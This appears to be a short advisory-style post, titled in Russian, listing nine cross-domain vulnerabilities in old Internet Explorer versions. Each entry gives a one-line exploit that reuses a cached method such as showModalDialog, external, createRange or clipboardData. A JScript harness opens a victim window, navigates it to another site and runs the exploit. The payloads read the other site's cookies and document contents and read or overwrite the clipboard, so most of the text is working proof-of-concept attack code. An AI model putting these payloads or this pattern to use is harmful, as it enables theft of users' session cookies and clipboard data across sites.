Девять новых уязвимостей в Internet Explorer

Вот эти уязвимости:

• showModalDialog
  Cache: var fVuln=oWin.showModalDialog;
  Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
  Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability.
  Impact: Full access in IE5.5, "My Computer" zone access in IE6.
• external
  Cache: var oVuln=oWin.external;
  Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
  Impact: Full access.
• createRange
  Cache: var fVuln=oWin.document.selection.createRange;
  Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");
  Impact: Full access.
• elementFromPoint
  Cache: var fVuln=oWin.document.elementFromPoint;
  Exploit: alert(fVuln(1,1).document.cookie);
  Impact: Full access.
• getElementById
  Cache: var fVuln=oWin.document.getElementById;
  Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);
  Impact: Full access.
• getElementsByName
  Cache: var fVuln=oWin.document.getElementsByName;
  Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
  Impact: Full access.
• getElementsByTagName
  Cache: var fVuln=oWin.document.getElementsByTagName;
  Exploit: alert(fVuln("BODY")[0].document.cookie);
  Impact: Full access.
• execCommand
  Cache: var fVuln=oWin.document.execCommand;
  Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text"));
  Impact: Read access to the loaded document.
• clipboardData
  Cache: var oVuln=oWin.clipboardData;
  Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");
  Impact: Read/write access to the clipboard, regardless of settings.

<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
location.href="http://google.com";
setTimeout(
════function () {
════════[Exploit line(s) here]
════},
════3000
);
</script>